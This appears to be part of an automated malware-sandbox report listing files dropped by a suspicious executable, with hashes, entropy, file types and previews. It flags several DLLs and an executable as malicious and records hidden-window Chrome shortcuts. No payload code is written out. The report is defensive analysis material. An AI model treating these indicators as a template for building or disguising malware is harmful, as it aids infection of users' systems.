                                                                                                                                                                                                                                                    SSDEEP:192:1wMv11IDCB7PFPHGosvS6UMn6uPrLBfVcO9MGM/OTMjmrUwrt:pduDLBfrMYMjw3Z
                                                                                                                                                                                                                                                    MD5:A2F80093F3AEEEAD14737CFE254EF4DE
                                                                                                                                                                                                                                                    SHA1:E67FC84CA26BEF5E9913FC4E545141BC914AA1EE
                                                                                                                                                                                                                                                    SHA-256:6212DCA4A797FCEBACE36F8EA2C6A4CE4BC660BA392C0ECB80724807263197F1
                                                                                                                                                                                                                                                    SHA-512:0F8D1DFEFE95F779A145BDC9D0C63D1CF9D8C75C648698C37CBFF71132F4178464B2DEA31909F386AE446E88FD89BCBE335765F2C3577456EA40A9DE24197C5C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# unsupported.tcl --.#.# Commands provided by Tk without official support. Use them at your.# own risk. They may change or go away without notice..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# ----------------------------------------------------------------------.# Unsupported compatibility interface for folks accessing Tk's private.# commands and variable against recommended usage..# ----------------------------------------------------------------------..namespace eval ::tk::unsupported {.. # Map from the old global names of Tk private commands to their. # new namespace-encapsulated names... variable PrivateCommands . array set PrivateCommands {..tkButtonAutoInvoke..::tk::ButtonAutoInvoke..tkButtonDown...::tk::ButtonDown..tkButtonEnter...::tk::ButtonEnter..tkButtonInvoke...::tk::ButtonInvoke..tkButtonLeave...::tk::ButtonLeave..tkButtonUp...::tk::ButtonUp..tkCancelRepeat...::tk::Canc
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):25974
                                                                                                                                                                                                                                                    Entropy (8bit):4.919711399379606
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:obPApXi6V2+Bec3iGn7H6HZ1KDRxRcbQ3sd1GkjDo413lK/RIVOMXrSommjiETwZ:orAZTunc3sd1GkF3cIVUx01w
                                                                                                                                                                                                                                                    MD5:1C9F8E939F67CAF0512A340D24783680
                                                                                                                                                                                                                                                    SHA1:B6182C5FD9C4FA582AB23B3FF70D93265BD55F35
                                                                                                                                                                                                                                                    SHA-256:42BA98733AE5CE3495D44199CDA5308064E1B46C898A55C6DFA24BE02B06BD81
                                                                                                                                                                                                                                                    SHA-512:6D4D3536B436CFE3792FD0D912FCB21BBD80CCEE577302B1CFAB5029E765EEFD5A98674D5FBE798BC7750D2F9B8C4FD794C5F4D19E0A18CFADC2DFB6D0AC0890
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# xmfbox.tcl --.#.#.Implements the "Motif" style file selection dialog for the.#.Unix platform. This implementation is used only if the.#."::tk_strictMotif" flag is set..#.# Copyright (c) 1996 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Scriptics Corporation.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::file {}...# ::tk::MotifFDialog --.#.#.Implements a file dialog similar to the standard Motif file.#.selection box..#.# Arguments:.#.type.."open" or "save".#.args..Options parsed by the procedure..#.# Results:.#.When -multiple is set to 0, this returns the absolute pathname.#.of the selected file. (NOTE: This is not the same as a single.#.element list.).# .#.When -multiple is set to > 0, this returns a Tcl list of absolute.# pathnames. The argument for -multiple is ignored, but for consistency.# with Windows it defines the ma
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):687104
                                                                                                                                                                                                                                                    Entropy (8bit):5.428887209456378
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:Qs363AxoMPBt8FpQsVdFiI5mZMPXubUxktwd:d3oxM8XQsVdXSPAxLd
                                                                                                                                                                                                                                                    MD5:A46E180E03AB5C2D802B8E6214067500
                                                                                                                                                                                                                                                    SHA1:5DE5EFBCE2E6E81B6B954B843090B387B7BA927E
                                                                                                                                                                                                                                                    SHA-256:689E5061CEFDA6223477A6A05906A500D59BD1B2A7458730B8D43C9D3B43BDBA
                                                                                                                                                                                                                                                    SHA-512:68BD7AE714FB4F117EB53A0FB968083772AAEAA6428AE8510E5C109361B140C98415A1955FCA49DB3E9E1B6AE19909E9C50110F499306476D01141C479C16335
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):100864
                                                                                                                                                                                                                                                    Entropy (8bit):6.566092703362159
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:eiWTWf6dvDiNGqW3iJqwzmufh+HcuVhV3LHhBNIxJ2cUQM2peoNci7Oahh:ZWT9dvDiNG1yJqwzmuUHcuVhVxcUQMEh
                                                                                                                                                                                                                                                    MD5:C8311157B239363A500513B04D1F6817
                                                                                                                                                                                                                                                    SHA1:791D08F71C39BB01536F5E442F07AC7A0416B8A7
                                                                                                                                                                                                                                                    SHA-256:7DE358652C1732CAF72F968A664301E256AAE281003DDCB0F5ECEF4B13101009
                                                                                                                                                                                                                                                    SHA-512:AB9DADD65C582F2B12AF49448FA4F5A96DA00ABCC257722331AC7E9CAD2E2770FDB7A0F2DB32C113F2DF33E6C84C8C0D594A36F1FB4F3A9CCDB8F3DC1DDFBDBF
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):18432
                                                                                                                                                                                                                                                    Entropy (8bit):6.091954091448561
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:H6ObLkEVhuSRk78FF0/ThAdbF7Epmn+W5D+TwGgjRSHQ3b5yvL:1bLkEV4SBF0/ThAdbF7Epm+oD+TwGgjq
                                                                                                                                                                                                                                                    MD5:9875CD79CFB4137EF4B97407141A407F
                                                                                                                                                                                                                                                    SHA1:499EF019C4D10D2F9C86B7E335D723BD35B96123
                                                                                                                                                                                                                                                    SHA-256:A9E176DF950BA410AC34C2E92BF09A6C046EB91C7AD002D6B5F7BEF60F0A4161
                                                                                                                                                                                                                                                    SHA-512:1FB0BA196A00CA6A0A1A6E57667F460C2B8CA00BC7CE6363E066F24840EC9208A40140CED60802CDB28F1B621F490C84C89F5089F5C2985A4F3FD494DDAB590E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):39424
                                                                                                                                                                                                                                                    Entropy (8bit):6.341139354476684
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:HT7/CCq6VtNmp1IJoFD+0J7bFf8ZtXnxRCtzjCI0EIMhRKCFbJ:z7/CCq6VtNmp1Oo8ZxqiI0EIMhRKQJ
                                                                                                                                                                                                                                                    MD5:EECBE6CD7AACD87B6F26A4AE11023E63
                                                                                                                                                                                                                                                    SHA1:3871C36DF783CDDC66FC42F3BB1D3EB3B489F1F9
                                                                                                                                                                                                                                                    SHA-256:2F11ED07C2BD9262072BC4E8B9C99E03A3D6CA4712ACB6D4C87393FDDAB8F205
                                                                                                                                                                                                                                                    SHA-512:ED284EC9198569C69115AC8CCBB8C873CEA81813A5838059A02A2B7DDBEFFABE459EC5D0351EE04E33FE8639A961EF4940BF395C1E740B50A2FD523C9D923EC2
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15872
                                                                                                                                                                                                                                                    Entropy (8bit):5.815218462579117
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:FSBRJVY+svPnRYsTJWr4f0JIxRqHZHzErP/i:cBfVY+svvdTsr4fhxKQ7
                                                                                                                                                                                                                                                    MD5:75D14D4671698A4B141A7CFE68020667
                                                                                                                                                                                                                                                    SHA1:9AE60989DAA109EE87DB08249C0F9ED4B592CFCE
                                                                                                                                                                                                                                                    SHA-256:6E2DE688F381ECAD132971272E4F171606263CC9F8FCB3EABAF8A4E0602C1FE7
                                                                                                                                                                                                                                                    SHA-512:52989D33F4E3115DCEFA67B4790B1754C3E26CFFF8EC6FB9E04D6CB292BBC434E579A9E130D2F151032C88EC9034DA7AA6D402A2841F8B5E05E271A3AA78D7A1
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):779264
                                                                                                                                                                                                                                                    Entropy (8bit):6.37133843214328
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:C08SW0XOKL6+NaYrgBOrNx8pSgv7PvwRZE7AR4wYEssGtPwmS0z6Z3qLV7NOMDHn:C0cvQt0fz6Z34RTAln
                                                                                                                                                                                                                                                    MD5:CF584E43F27C323E90FD668E9FEE377C
                                                                                                                                                                                                                                                    SHA1:633864E395CCE14F01621CE9C8EF76D6521677B1
                                                                                                                                                                                                                                                    SHA-256:94DB1996FBF71FC822B441E17865F429258F3F02CECC9609FDEB6785F0CD88B7
                                                                                                                                                                                                                                                    SHA-512:43D4B2D13CF1BAF2CA865F5B6E172945E97DE2734ACF36D6E5C7F304E6908B47AA1EE682DBB77225DD0AD4DC3A64B2AB783033BF201DC85FE00EE346E2100528
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.4.}.Z.}.Z.}.Z....q.Z..0..|.Z.c-..~.Z.c-..q.Z.c-..t.Z.}.[..zZ.c-..J.Z.c-..|.Z.c-..|.Z.c-..|.Z.Rich}.Z.................PE..L....l.^...........!.....J...................`....(..........................P.......q...............................<..!M..$........0..h....................P..|....w..................................@............`...............................text....H.......J.................. ..`.rdata...)...`...*...N..............@..@.data...........^...x..............@....rsrc...h....0......................@..@.reloc..|....P......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3220480
                                                                                                                                                                                                                                                    Entropy (8bit):6.6558508778698835
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:98304:InuGM5xECMK59cccgccctccOccccccccccYcccFCccccvcccyFcXccckc4cccccq:eM5xELKXcccgccctccOccccccccccYcS
                                                                                                                                                                                                                                                    MD5:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    SHA1:5A1993097306BF2AC08F4BC457DA97C797669989
                                                                                                                                                                                                                                                    SHA-256:7BD2D52A3DBD6ADFC7538319829BD471C1C9140709D8083A80A860EC2DEB93E1
                                                                                                                                                                                                                                                    SHA-512:A064F8E89FDEC590365B19B3265A69F2E764DAC4B3F1197A151F5BE9DC49E07A0AAD8F9ACACA3B2F2ACA7CAF403A744E46FEC84FE62E3D0FF99CE5DBC1D0CC3E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2675
                                                                                                                                                                                                                                                    Entropy (8bit):3.978240424475412
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:85hd8TUtJHHfidAKZdA1nehwiZUklqehwy+3:85gcHLy
                                                                                                                                                                                                                                                    MD5:1A15192293B63287D5B92CAAEF2C1C86
                                                                                                                                                                                                                                                    SHA1:A7AB5740F6D0CC5B15E6EDC5DECFF6C3E3A44827
                                                                                                                                                                                                                                                    SHA-256:A3ED01719CD156D3019DDD7998806CB869511A63A1D107B48AA647A91C4BD3BE
                                                                                                                                                                                                                                                    SHA-512:6A85F8B27E8FFD21C75DD5ABF5D2989DEA51FFB638D82BF1BC097F98BB1D0A051C55180BED35D7F2A9281C92D7C6E2C90FCE10C84DED4D68F2D6A408DAA375F8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                                    Entropy (8bit):3.997478604916015
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:8chd8TUtJHHfidAKZdA1geh/iZUkAQkqeh7y+2:8cgcj9Qey
                                                                                                                                                                                                                                                    MD5:D9A8CAD2B1409DC4A38A15DE8382C553
                                                                                                                                                                                                                                                    SHA1:39BE920BE01A3B67192D954A42DCA587DF1AFF2C
                                                                                                                                                                                                                                                    SHA-256:CB5A646F2B190DC9F5E44E871CE25260FDB31364DD8740D535E787638084A394
                                                                                                                                                                                                                                                    SHA-512:B06BE7A7122E98D8C074163CEEBF5C215144E331A0318A9394EFBCDFDAB1DE2EF058B63C33A8C8F5F53FDDF595C5C7114A0B65A3175517F291528FC8BEAC8CF5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....|.=.[......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YTu............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 09:52:18 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2691
                                                                                                                                                                                                                                                    Entropy (8bit):4.004189851862961
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:87hd8TUtJCHfidAKZdA148eh7sFiZUkmgqeh7shy+BX:87gcinny
                                                                                                                                                                                                                                                    MD5:46689AEBB8DEBC656191A16A7A8E999E
                                                                                                                                                                                                                                                    SHA1:F07560354B4B5C6C6CA0E5C0EEB33161CEA5D769
                                                                                                                                                                                                                                                    SHA-256:35EB9F123F585BD88979C9B24F5CAEF6D0DAD5194F5F3A1EF3D52B73327C3296
                                                                                                                                                                                                                                                    SHA-512:29D6504766582A357E2EA3F44080E8F72FF53ED2FB604330927C4163D40D422FC97D02B3F36C3510BCECCE752A1A74DB83CE04C77846E957E2DD407D1A756782
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....s4..z.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VEW.V............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                    Entropy (8bit):3.9933375508340596
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:8ihd8TUtJHHfidAKZdA1lehDiZUkwqeh/y+R:8igc+Zy
                                                                                                                                                                                                                                                    MD5:44574247629077EF3DFBD63A7278B50B
                                                                                                                                                                                                                                                    SHA1:BF672708E49F60112A454BECC487880A095E7218
                                                                                                                                                                                                                                                    SHA-256:43A1E5CC7096BA9E43151808D49BD9D487CB24AFA3B64E0AF766CD91F288C099
                                                                                                                                                                                                                                                    SHA-512:408C91C97E67FC87322C39936CDE6E118CFBBB92BCA5CF16A8C2C669A3EED20CA8388E58E4525DA0CCCAAF42F03C4F37B189216A7056997A8031B7BF24368E0E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....v.|=.[......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YTu............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
